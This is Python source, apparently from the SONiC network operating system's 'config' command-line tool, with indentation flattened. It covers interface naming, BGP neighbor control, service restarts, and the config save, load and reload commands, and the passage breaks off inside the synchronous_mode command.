def interface_alias_to_name(config_db, interface_alias):
"""Return default interface name if alias name is given as argument
"""
vlan_id = ""
sub_intf_sep_idx = -1
if interface_alias is not None:
sub_intf_sep_idx = interface_alias.find(VLAN_SUB_INTERFACE_SEPARATOR)
if sub_intf_sep_idx != -1:
vlan_id = interface_alias[sub_intf_sep_idx + 1:]
# interface_alias holds the parent port name so the subsequent logic still applies
interface_alias = interface_alias[:sub_intf_sep_idx]
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_alias)
if namespace is None:
return None
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
if interface_alias is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict.keys():
if interface_alias == port_dict[port_name]['alias']:
return port_name if sub_intf_sep_idx == -1 else port_name + VLAN_SUB_INTERFACE_SEPARATOR + vlan_id
# Interface alias not in port_dict, just return interface_alias, e.g.,
# portchannel is passed in as argument, which does not have an alias
return interface_alias if sub_intf_sep_idx == -1 else interface_alias + VLAN_SUB_INTERFACE_SEPARATOR + vlan_id
def interface_name_is_valid(config_db, interface_name):
"""Check if the interface name is valid
"""
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_name)
if namespace is None:
return False
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
port_channel_dict = config_db.get_table('PORTCHANNEL')
sub_port_intf_dict = config_db.get_table('VLAN_SUB_INTERFACE')
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict.keys():
if interface_name == port_name:
return True
if port_channel_dict:
for port_channel_name in port_channel_dict.keys():
if interface_name == port_channel_name:
return True
if sub_port_intf_dict:
for sub_port_intf_name in sub_port_intf_dict.keys():
if interface_name == sub_port_intf_name:
return True
return False
def interface_name_to_alias(config_db, interface_name):
"""Return alias interface name if default name is given as argument
"""
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_name)
if namespace is None:
return None
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
if interface_name is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict.keys():
if interface_name == port_name:
return port_dict[port_name]['alias']
return None
def interface_ipaddr_dependent_on_interface(config_db, interface_name):
"""Get table keys including ipaddress
"""
data = []
table_name = get_interface_table_name(interface_name)
if table_name == "":
return data
keys = config_db.get_keys(table_name)
for key in keys:
if interface_name in key and len(key) == 2:
data.append(key)
return data
def is_interface_bind_to_vrf(config_db, interface_name):
"""Get interface if bind to vrf or not
"""
table_name = get_interface_table_name(interface_name)
if table_name == "":
return False
entry = config_db.get_entry(table_name, interface_name)
if entry and entry.get("vrf_name"):
return True
return False
# Return the namespace where an interface belongs
# The port name input could be in default mode or in alias mode.
def get_port_namespace(port):
# If it is a non multi-asic platform, or if the interface is management interface
# return DEFAULT_NAMESPACE
if not multi_asic.is_multi_asic() or port == 'eth0':
return DEFAULT_NAMESPACE
# Get the table to check for interface presence
table_name = get_port_table_name(port)
if table_name == "":
return None
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
# If the interface naming mode is alias, search the tables for alias_name.
if clicommon.get_interface_naming_mode() == "alias":
port_dict = config_db.get_table(table_name)
if port_dict:
for port_name in port_dict.keys():
if port == port_dict[port_name]['alias']:
return namespace
else:
entry = config_db.get_entry(table_name, port)
if entry:
return namespace
return None
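# --- Illustrative sketch (not part of the original file): resolving the
# namespace of a port and opening the matching ConfigDBConnector with the
# helpers above; the default port name is made up for illustration.
def _example_connect_config_db_for_port(port='Ethernet0'):
    namespace = get_port_namespace(port)
    if namespace is None:
        return None
    config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
    config_db.connect()
    return config_db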
def del_interface_bind_to_vrf(config_db, vrf_name):
"""del interface bind to vrf
"""
tables = ['INTERFACE', 'PORTCHANNEL_INTERFACE', 'VLAN_INTERFACE', 'LOOPBACK_INTERFACE']
for table_name in tables:
interface_dict = config_db.get_table(table_name)
if interface_dict:
for interface_name in interface_dict.keys():
if 'vrf_name' in interface_dict[interface_name] and vrf_name == interface_dict[interface_name]['vrf_name']:
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
def set_interface_naming_mode(mode):
"""Modify SONIC_CLI_IFACE_MODE env variable in user .bashrc
"""
user = os.getenv('SUDO_USER')
bashrc_ifacemode_line = "export SONIC_CLI_IFACE_MODE={}".format(mode)
# In case of multi-asic, we can check for the alias mode support in any of
# the namespaces as this setting of alias mode should be identical everywhere.
# Here by default we set the namespaces to be a list just having '' which
# represents the linux host. In case of multi-asic, we take the first namespace
# created for the front facing ASIC.
namespaces = [DEFAULT_NAMESPACE]
if multi_asic.is_multi_asic():
namespaces = multi_asic.get_all_namespaces()['front_ns']
# Ensure all interfaces have an 'alias' key in PORT dict
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespaces[0])
config_db.connect()
port_dict = config_db.get_table('PORT')
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict.keys():
try:
if port_dict[port_name]['alias']:
pass
except KeyError:
click.echo("Platform does not support alias mapping")
raise click.Abort()
if not user:
user = os.getenv('USER')
if user != "root":
bashrc = "/home/{}/.bashrc".format(user)
else:
click.get_current_context().fail("Cannot set interface naming mode for root user!")
f = open(bashrc, 'r')
filedata = f.read()
f.close()
if "SONIC_CLI_IFACE_MODE" not in filedata:
newdata = filedata + bashrc_ifacemode_line
newdata += "\n"
else:
newdata = re.sub(r"export SONIC_CLI_IFACE_MODE=\w+",
bashrc_ifacemode_line, filedata)
f = open(bashrc, 'w')
f.write(newdata)
f.close()
click.echo("Please logout and log back in for changes take effect.")
# Get the local BGP ASN from DEVICE_METADATA
def get_local_bgp_asn(config_db):
metadata = config_db.get_table('DEVICE_METADATA')
return metadata['localhost']['bgp_asn']
def _is_neighbor_ipaddress(config_db, ipaddress):
"""Returns True if a neighbor has the IP address <ipaddress>, False if not
"""
entry = config_db.get_entry('BGP_NEIGHBOR', ipaddress)
return True if entry else False
def _get_all_neighbor_ipaddresses(config_db, ignore_local_hosts=False):
"""Returns list of strings containing IP addresses of all BGP neighbors
If the flag ignore_local_hosts is set to True, an additional check is done to see
whether the BGP neighbor's AS number is the same as the local BGP AS number; if so, that neighbor is ignored.
"""
addrs = []
bgp_sessions = config_db.get_table('BGP_NEIGHBOR')
local_as = get_local_bgp_asn(config_db)
for addr, session in bgp_sessions.items():
if not ignore_local_hosts or (ignore_local_hosts and local_as != session['asn']):
addrs.append(addr)
return addrs
def _get_neighbor_ipaddress_list_by_hostname(config_db, hostname):
"""Returns list of strings, each containing an IP address of neighbor with
hostname <hostname>. Returns empty list if <hostname> not a neighbor
"""
addrs = []
bgp_sessions = config_db.get_table('BGP_NEIGHBOR')
for addr, session in bgp_sessions.items():
if 'name' in session and session['name'] == hostname:
addrs.append(addr)
return addrs
def _change_bgp_session_status_by_addr(config_db, ipaddress, status, verbose):
"""Start up or shut down BGP session by IP address
"""
verb = 'Starting' if status == 'up' else 'Shutting'
click.echo("{} {} BGP session with neighbor {}...".format(verb, status, ipaddress))
config_db.mod_entry('bgp_neighbor', ipaddress, {'admin_status': status})
def _change_bgp_session_status(config_db, ipaddr_or_hostname, status, verbose):
"""Start up or shut down BGP session by IP address or hostname
"""
ip_addrs = []
# If we were passed an IP address, convert it to lowercase because IPv6 addresses were
# stored in ConfigDB with all lowercase alphabet characters during minigraph parsing
if _is_neighbor_ipaddress(config_db, ipaddr_or_hostname.lower()):
ip_addrs.append(ipaddr_or_hostname.lower())
else:
# If <ipaddr_or_hostname> is not the IP address of a neighbor, check to see if it's a hostname
ip_addrs = _get_neighbor_ipaddress_list_by_hostname(config_db, ipaddr_or_hostname)
if not ip_addrs:
return False
for ip_addr in ip_addrs:
_change_bgp_session_status_by_addr(config_db, ip_addr, status, verbose)
return True
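# --- Illustrative sketch (not part of the original file): shutting down a BGP
# session by neighbor IP address or hostname with the helper above; the
# neighbor value is made up for illustration.
def _example_shutdown_bgp_neighbor(config_db, neighbor='10.0.0.1'):
    if not _change_bgp_session_status(config_db, neighbor, 'down', verbose=False):
        click.echo("Could not locate neighbor '{}'".format(neighbor))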
def _validate_bgp_neighbor(config_db, neighbor_ip_or_hostname):
"""validates whether the given ip or host name is a BGP neighbor
"""
ip_addrs = []
if _is_neighbor_ipaddress(config_db, neighbor_ip_or_hostname.lower()):
ip_addrs.append(neighbor_ip_or_hostname.lower())
else:
ip_addrs = _get_neighbor_ipaddress_list_by_hostname(config_db, neighbor_ip_or_hostname.upper())
return ip_addrs
def _remove_bgp_neighbor_config(config_db, neighbor_ip_or_hostname):
"""Removes BGP configuration of the given neighbor
"""
ip_addrs = _validate_bgp_neighbor(config_db, neighbor_ip_or_hostname)
if not ip_addrs:
return False
for ip_addr in ip_addrs:
config_db.mod_entry('bgp_neighbor', ip_addr, None)
click.echo("Removed configuration of BGP neighbor {}".format(ip_addr))
return True
def _change_hostname(hostname):
current_hostname = os.uname()[1]
if current_hostname != hostname:
clicommon.run_command('echo {} > /etc/hostname'.format(hostname), display_cmd=True)
clicommon.run_command('hostname -F /etc/hostname', display_cmd=True)
clicommon.run_command(r'sed -i "/\s{}$/d" /etc/hosts'.format(current_hostname), display_cmd=True)
clicommon.run_command('echo "127.0.0.1 {}" >> /etc/hosts'.format(hostname), display_cmd=True)
def _clear_qos():
QOS_TABLE_NAMES = [
'TC_TO_PRIORITY_GROUP_MAP',
'MAP_PFC_PRIORITY_TO_QUEUE',
'TC_TO_QUEUE_MAP',
'DSCP_TO_TC_MAP',
'SCHEDULER',
'PFC_PRIORITY_TO_PRIORITY_GROUP_MAP',
'PORT_QOS_MAP',
'WRED_PROFILE',
'QUEUE',
'CABLE_LENGTH',
'BUFFER_POOL',
'BUFFER_PROFILE',
'BUFFER_PG',
'BUFFER_QUEUE']
namespace_list = [DEFAULT_NAMESPACE]
if multi_asic.get_num_asics() > 1:
namespace_list = multi_asic.get_namespaces_from_linux()
for ns in namespace_list:
if ns is DEFAULT_NAMESPACE:
config_db = ConfigDBConnector()
else:
config_db = ConfigDBConnector(
use_unix_socket_path=True, namespace=ns
)
config_db.connect()
for qos_table in QOS_TABLE_NAMES:
config_db.delete_table(qos_table)
def _get_sonic_generated_services(num_asic):
if not os.path.isfile(SONIC_GENERATED_SERVICE_PATH):
return None
generated_services_list = []
generated_multi_instance_services = []
with open(SONIC_GENERATED_SERVICE_PATH) as generated_service_file:
for line in generated_service_file:
if '@' in line:
line = line.replace('@', '')
if num_asic > 1:
generated_multi_instance_services.append(line.rstrip('\n'))
else:
generated_services_list.append(line.rstrip('\n'))
else:
generated_services_list.append(line.rstrip('\n'))
return generated_services_list, generated_multi_instance_services
# Callback for confirmation prompt. Aborts if user enters "n"
def _abort_if_false(ctx, param, value):
if not value:
ctx.abort()
def _get_disabled_services_list(config_db):
disabled_services_list = []
feature_table = config_db.get_table('FEATURE')
if feature_table is not None:
for feature_name in feature_table.keys():
if not feature_name:
log.log_warning("Feature is None")
continue
state = feature_table[feature_name]['state']
if not state:
log.log_warning("Enable state of feature '{}' is None".format(feature_name))
continue
if state == "disabled":
disabled_services_list.append(feature_name)
else:
log.log_warning("Unable to retreive FEATURE table")
return disabled_services_list
def _stop_services(config_db):
# This list is order-dependent. Please add services in the order they should be stopped
# on Mellanox platform pmon is stopped by syncd
services_to_stop = [
'telemetry',
'restapi',
'swss',
'lldp',
'pmon',
'bgp',
'hostcfgd',
'nat'
]
if asic_type == 'mellanox' and 'pmon' in services_to_stop:
services_to_stop.remove('pmon')
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_stop:
services_to_stop.remove(service)
execute_systemctl(services_to_stop, SYSTEMCTL_ACTION_STOP)
def _reset_failed_services(config_db):
# This list is order-independent. Please keep list in alphabetical order
services_to_reset = [
'bgp',
'dhcp_relay',
'hostcfgd',
'hostname-config',
'interfaces-config',
'lldp',
'nat',
'ntp-config',
'pmon',
'radv',
'restapi',
'rsyslog-config',
'sflow',
'snmp',
'swss',
'syncd',
'teamd',
'telemetry'
]
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_reset:
services_to_reset.remove(service)
execute_systemctl(services_to_reset, SYSTEMCTL_ACTION_RESET_FAILED)
def _restart_services(config_db):
# This list is order-dependent. Please add services in the order they should be started
# on Mellanox platform pmon is started by syncd
services_to_restart = [
'hostname-config',
'interfaces-config',
'ntp-config',
'rsyslog-config',
'swss',
'bgp',
'pmon',
'lldp',
'hostcfgd',
'nat',
'sflow',
'restapi',
'telemetry'
]
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_restart:
services_to_restart.remove(service)
if asic_type == 'mellanox' and 'pmon' in services_to_restart:
services_to_restart.remove('pmon')
execute_systemctl(services_to_restart, SYSTEMCTL_ACTION_RESTART)
# Reload Monit configuration to pick up new hostname in case it changed
click.echo("Reloading Monit configuration ...")
clicommon.run_command("sudo monit reload")
def interface_is_in_vlan(vlan_member_table, interface_name):
""" Check if an interface is in a vlan """
for _,intf in vlan_member_table.keys():
if intf == interface_name:
return True
return False
def interface_is_in_portchannel(portchannel_member_table, interface_name):
""" Check if an interface is part of portchannel """
for _,intf in portchannel_member_table.keys():
if intf == interface_name:
return True
return False
def interface_has_mirror_config(mirror_table, interface_name):
""" Check if port is already configured with mirror config """
for _,v in mirror_table.items():
if 'src_port' in v and v['src_port'] == interface_name:
return True
if 'dst_port' in v and v['dst_port'] == interface_name:
return True
return False
def validate_mirror_session_config(config_db, session_name, dst_port, src_port, direction):
""" Check if SPAN mirror-session config is valid """
if len(config_db.get_entry('MIRROR_SESSION', session_name)) != 0:
click.echo("Error: {} already exists".format(session_name))
return False
vlan_member_table = config_db.get_table('VLAN_MEMBER')
mirror_table = config_db.get_table('MIRROR_SESSION')
portchannel_member_table = config_db.get_table('PORTCHANNEL_MEMBER')
if dst_port:
if not interface_name_is_valid(config_db, dst_port):
click.echo("Error: Destination Interface {} is invalid".format(dst_port))
return False
if interface_is_in_vlan(vlan_member_table, dst_port):
click.echo("Error: Destination Interface {} has vlan config".format(dst_port))
return False
if interface_has_mirror_config(mirror_table, dst_port):
click.echo("Error: Destination Interface {} already has mirror config".format(dst_port))
return False
if interface_is_in_portchannel(portchannel_member_table, dst_port):
click.echo("Error: Destination Interface {} has portchannel config".format(dst_port))
return False
if clicommon.is_port_router_interface(config_db, dst_port):
click.echo("Error: Destination Interface {} is a L3 interface".format(dst_port))
return False
if src_port:
for port in src_port.split(","):
if not interface_name_is_valid(config_db, port):
click.echo("Error: Source Interface {} is invalid".format(port))
return False
if dst_port and dst_port == port:
click.echo("Error: Destination Interface cant be same as Source Interface")
return False
if interface_has_mirror_config(mirror_table, port):
click.echo("Error: Source Interface {} already has mirror config".format(port))
return False
if direction:
if direction not in ['rx', 'tx', 'both']:
click.echo("Error: Direction {} is invalid".format(direction))
return False
return True
def update_sonic_environment():
"""Prepare sonic environment variable using SONiC environment template file.
"""
SONIC_ENV_TEMPLATE_FILE = os.path.join('/', "usr", "share", "sonic", "templates", "sonic-environment.j2")
SONIC_VERSION_YML_FILE = os.path.join('/', "etc", "sonic", "sonic_version.yml")
SONIC_ENV_FILE = os.path.join('/', "etc", "sonic", "sonic-environment")
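# Note: sonic-cfggen -d reads CONFIG_DB data, -y loads extra variables from sonic_version.yml,
# and -t renders the j2 template into SONIC_ENV_FILE.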
if os.path.isfile(SONIC_ENV_TEMPLATE_FILE) and os.path.isfile(SONIC_VERSION_YML_FILE):
clicommon.run_command(
"{} -d -y {} -t {},{}".format(
SONIC_CFGGEN_PATH,
SONIC_VERSION_YML_FILE,
SONIC_ENV_TEMPLATE_FILE,
SONIC_ENV_FILE
),
display_cmd=True
)
# This is our main entrypoint - the main 'config' command
@click.group(cls=clicommon.AbbreviationGroup, context_settings=CONTEXT_SETTINGS)
@click.pass_context
def config(ctx):
"""SONiC command line - 'config' command"""
#
# Load asic_type for further use
#
global asic_type
try:
version_info = device_info.get_sonic_version_info()
asic_type = version_info['asic_type']
except (KeyError, TypeError):
raise click.Abort()
if asic_type == 'mellanox':
platform.add_command(mlnx.mlnx)
# Load the global config file database_global.json once.
SonicDBConfig.load_sonic_global_db_config()
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
ctx.obj = Db()
# Add groups from other modules
config.add_command(aaa.aaa)
config.add_command(aaa.tacacs)
config.add_command(console.console)
config.add_command(feature.feature)
config.add_command(kube.kubernetes)
config.add_command(nat.nat)
config.add_command(vlan.vlan)
config.add_command(chassis_modules.chassis_modules)
@config.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Existing files will be overwritten, continue?')
@click.argument('filename', required=False)
def save(filename):
"""Export current config DB to a file on disk.\n
<filename> : Names of configuration file(s) to save, separated by comma with no spaces in between
"""
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user gives the filename(s), extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
# In case of multi-asic mode we have additional config_db{NS}.json files for
# various namespaces created per ASIC. {NS} is the namespace index.
for inst in range(-1, num_cfg_file-1):
# inst = -1 refers to the Linux host, where there is no namespace.
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
if namespace is None:
command = "{} -d --print-data > {}".format(SONIC_CFGGEN_PATH, file)
else:
command = "{} -n {} -d --print-data > {}".format(SONIC_CFGGEN_PATH, namespace, file)
log.log_info("'save' executing...")
clicommon.run_command(command, display_cmd=True)
@config.command()
@click.option('-y', '--yes', is_flag=True)
@click.argument('filename', required=False)
def load(filename, yes):
"""Import a previous saved config DB dump file.
<filename> : Names of configuration file(s) to load, separated by comma with no spaces in between
"""
if filename is None:
message = 'Load config from the default config file(s) ?'
else:
message = 'Load config from the file(s) {} ?'.format(filename)
if not yes:
click.confirm(message, abort=True)
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user gives the filename(s), extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
# In case of multi-asic mode we have additional config_db{NS}.json files for
# various namespaces created per ASIC. {NS} is the namespace index.
for inst in range(-1, num_cfg_file-1):
# inst = -1 refers to the Linux host, where there is no namespace.
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
# if any of the config files in linux host OR namespace is not present, return
if not os.path.exists(file):
click.echo("The config_db file {} doesn't exist".format(file))
return
if namespace is None:
command = "{} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, file)
else:
command = "{} -n {} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, namespace, file)
log.log_info("'load' executing...")
clicommon.run_command(command, display_cmd=True)
@config.command()
@click.option('-y', '--yes', is_flag=True)
@click.option('-l', '--load-sysinfo', is_flag=True, help='load system default information (mac, portmap etc) first.')
@click.option('-n', '--no_service_restart', default=False, is_flag=True, help='Do not restart docker services')
@click.argument('filename', required=False)
@clicommon.pass_db
def reload(db, filename, yes, load_sysinfo, no_service_restart):
"""Clear current configuration and import a previous saved config DB dump file.
<filename> : Names of configuration file(s) to load, separated by comma with no spaces in between
"""
if filename is None:
message = 'Clear current config and reload config from the default config file(s) ?'
else:
message = 'Clear current config and reload config from the file(s) {} ?'.format(filename)
if not yes:
click.confirm(message, abort=True)
log.log_info("'reload' executing...")
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user gives the filename(s), extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
if load_sysinfo:
command = "{} -j {} -v DEVICE_METADATA.localhost.hwsku".format(SONIC_CFGGEN_PATH, filename)
# Decode the output as text so cfg_hwsku below is a str rather than bytes.
proc = subprocess.Popen(command, shell=True, text=True, stdout=subprocess.PIPE)
cfg_hwsku, err = proc.communicate()
if err:
click.echo("Could not get the HWSKU from config file, exiting")
sys.exit(1)
else:
cfg_hwsku = cfg_hwsku.strip()
#Stop services before config push
if not no_service_restart:
log.log_info("'reload' stopping services...")
_stop_services(db.cfgdb)
# In Single ASIC platforms we have single DB service. In multi-ASIC platforms we have a global DB
# service running in the host + DB services running in each ASIC namespace created per ASIC.
# In the below logic, we get all namespaces in this platform and add an empty namespace ''
# denoting the current namespace which we are in ( the linux host )
for inst in range(-1, num_cfg_file-1):
# Get the namespace name, for linux host it is None
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
# Check the file exists before proceeding.
if not os.path.exists(file):
click.echo("The config_db file {} doesn't exist".format(file))
continue
if namespace is None:
config_db = ConfigDBConnector()
else:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
client = config_db.get_redis_client(config_db.CONFIG_DB)
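# Wipe the existing CONFIG_DB contents before writing the new configuration below.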
client.flushdb()
if load_sysinfo:
if namespace is None:
command = "{} -H -k {} --write-to-db".format(SONIC_CFGGEN_PATH, cfg_hwsku)
else:
command = "{} -H -k {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, cfg_hwsku, namespace)
clicommon.run_command(command, display_cmd=True)
# For the database service running in linux host we use the file user gives as input
# or by default DEFAULT_CONFIG_DB_FILE. In the case of database service running in namespace,
# the default config_db<namespaceID>.json format is used.
if namespace is None:
if os.path.isfile(INIT_CFG_FILE):
command = "{} -j {} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, INIT_CFG_FILE, file)
else:
command = "{} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, file)
else:
if os.path.isfile(INIT_CFG_FILE):
command = "{} -j {} -j {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, INIT_CFG_FILE, file, namespace)
else:
command = "{} -j {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, file, namespace)
clicommon.run_command(command, display_cmd=True)
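# Presumably marks CONFIG_DB as initialized so consumers know a full configuration has been loaded.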
client.set(config_db.INIT_INDICATOR, 1)
# Migrate DB contents to latest version
db_migrator='/usr/local/bin/db_migrator.py'
if os.path.isfile(db_migrator) and os.access(db_migrator, os.X_OK):
if namespace is None:
command = "{} -o migrate".format(db_migrator)
else:
command = "{} -o migrate -n {}".format(db_migrator, namespace)
clicommon.run_command(command, display_cmd=True)
# We first run "systemctl reset-failed" to remove the "failed"
# status from all services before we attempt to restart them
if not no_service_restart:
_reset_failed_services(db.cfgdb)
log.log_info("'reload' restarting services...")
_restart_services(db.cfgdb)
@config.command("load_mgmt_config")
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Reload mgmt config?')
@click.argument('filename', default='/etc/sonic/device_desc.xml', type=click.Path(exists=True))
def load_mgmt_config(filename):
"""Reconfigure hostname and mgmt interface based on device description file."""
log.log_info("'load_mgmt_config' executing...")
command = "{} -M {} --write-to-db".format(SONIC_CFGGEN_PATH, filename)
clicommon.run_command(command, display_cmd=True)
#FIXME: After config DB daemon for hostname and mgmt interface is implemented, we'll no longer need to do manual configuration here
config_data = parse_device_desc_xml(filename)
hostname = config_data['DEVICE_METADATA']['localhost']['hostname']
_change_hostname(hostname)
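# MGMT_INTERFACE keys are (port, ip_prefix) tuples, e.g. ("eth0", "10.0.0.100/24") (illustrative),
# so index [1] below extracts the IP prefix while the entry value carries the gateway address.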
mgmt_conf = netaddr.IPNetwork(list(config_data['MGMT_INTERFACE'].keys())[0][1])
gw_addr = list(config_data['MGMT_INTERFACE'].values())[0]['gwaddr']
command = "ifconfig eth0 {} netmask {}".format(str(mgmt_conf.ip), str(mgmt_conf.netmask))
clicommon.run_command(command, display_cmd=True)
command = "ip route add default via {} dev eth0 table default".format(gw_addr)
clicommon.run_command(command, display_cmd=True, ignore_error=True)
command = "ip rule add from {} table default".format(str(mgmt_conf.ip))
clicommon.run_command(command, display_cmd=True, ignore_error=True)
command = "[ -f /var/run/dhclient.eth0.pid ] && kill `cat /var/run/dhclient.eth0.pid` && rm -f /var/run/dhclient.eth0.pid"
clicommon.run_command(command, display_cmd=True, ignore_error=True)
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
@config.command("load_minigraph")
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Reload config from minigraph?')
@click.option('-n', '--no_service_restart', default=False, is_flag=True, help='Do not restart docker services')
@clicommon.pass_db
def load_minigraph(db, no_service_restart):
"""Reconfigure based on minigraph."""
log.log_info("'load_minigraph' executing...")
#Stop services before config push
if not no_service_restart:
log.log_info("'load_minigraph' stopping services...")
_stop_services(db.cfgdb)
# For single-ASIC platforms the namespace list contains only the default (empty) namespace.
# For multi-ASIC platforms the default namespace generates the config for the host, and the
# per-ASIC namespaces are appended below.
namespace_list = [DEFAULT_NAMESPACE]
num_npus = multi_asic.get_num_asics()
if num_npus > 1:
namespace_list += multi_asic.get_namespaces_from_linux()
for namespace in namespace_list:
if namespace is DEFAULT_NAMESPACE:
config_db = ConfigDBConnector()
cfggen_namespace_option = " "
ns_cmd_prefix = ""
else:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
cfggen_namespace_option = " -n {}".format(namespace)
ns_cmd_prefix = "sudo ip netns exec {} ".format(namespace)
config_db.connect()
client = config_db.get_redis_client(config_db.CONFIG_DB)
client.flushdb()
if os.path.isfile('/etc/sonic/init_cfg.json'):
command = "{} -H -m -j /etc/sonic/init_cfg.json {} --write-to-db".format(SONIC_CFGGEN_PATH, cfggen_namespace_option)
else:
command = "{} -H -m --write-to-db {}".format(SONIC_CFGGEN_PATH, cfggen_namespace_option)
clicommon.run_command(command, display_cmd=True)
client.set(config_db.INIT_INDICATOR, 1)
# get the device type
device_type = _get_device_type()
if device_type != 'MgmtToRRouter':
clicommon.run_command("pfcwd start_default", display_cmd=True)
# Update SONiC environment file
update_sonic_environment()
if os.path.isfile('/etc/sonic/acl.json'):
clicommon.run_command("acl-loader update full /etc/sonic/acl.json", display_cmd=True)
# generate QoS and Buffer configs
clicommon.run_command("config qos reload", display_cmd=True)
# Write latest db version string into db
db_migrator='/usr/local/bin/db_migrator.py'
if os.path.isfile(db_migrator) and os.access(db_migrator, os.X_OK):
for namespace in namespace_list:
if namespace is DEFAULT_NAMESPACE:
cfggen_namespace_option = " "
else:
cfggen_namespace_option = " -n {}".format(namespace)
clicommon.run_command(db_migrator + ' -o set_version' + cfggen_namespace_option)
# We first run "systemctl reset-failed" to remove the "failed"
# status from all services before we attempt to restart them
if not no_service_restart:
_reset_failed_services(db.cfgdb)
#FIXME: After config DB daemon is implemented, we'll no longer need to restart every service.
log.log_info("'load_minigraph' restarting services...")
_restart_services(db.cfgdb)
click.echo("Please note setting loaded from minigraph will be lost after system reboot. To preserve setting, run `config save`.")
#
# 'hostname' command
#
@config.command('hostname')
@click.argument('new_hostname', metavar='<new_hostname>', required=True)
def hostname(new_hostname):
"""Change device hostname without impacting the traffic."""
config_db = ConfigDBConnector()
config_db.connect()
config_db.mod_entry('DEVICE_METADATA' , 'localhost', {"hostname" : new_hostname})
try:
command = "service hostname-config restart"
clicommon.run_command(command, display_cmd=True)
except SystemExit as e:
click.echo("Restarting hostname-config service failed with error {}".format(e))
raise
# Reload Monit configuration to pick up new hostname in case it changed
click.echo("Reloading Monit configuration ...")
clicommon.run_command("sudo monit reload")
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
#
# 'synchronous_mode' command ('config synchronous_mode ...')
#
@config.command('synchronous_mode')
@click.argument('sync_mode', metavar='<enable|disable>', required=True)
def synchronous_mode(sync_mode):
""" Enable or disable synchronous mode between orchagent and syncd \n
swss restart required to apply the configuration \n
Options to restart swss and apply the configuration: \n
1. config save -y \n
config reload -y \n
2. systemctl restart swss
"""
if sync_mode == 'enable' or sync_mode == 'disable':
config_db = ConfigDBConnector()
config_db.connect()
